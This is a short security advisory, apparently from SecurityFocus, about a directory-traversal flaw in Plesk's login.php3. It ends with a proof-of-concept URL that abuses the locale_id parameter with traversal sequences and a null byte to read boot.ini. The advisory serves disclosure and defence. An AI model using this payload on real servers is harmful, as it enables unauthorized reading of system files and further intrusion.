7 lines
No EOL
466 B
Text
7 lines
No EOL
466 B
Text
source: https://www.securityfocus.com/bid/23639/info
|
|
|
|
Plesk is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.
|
|
|
|
https://www.example.com/login.php3?login_name=x&passwd=x&locale_id=../../../../../../../../boot.ini%00.jpg |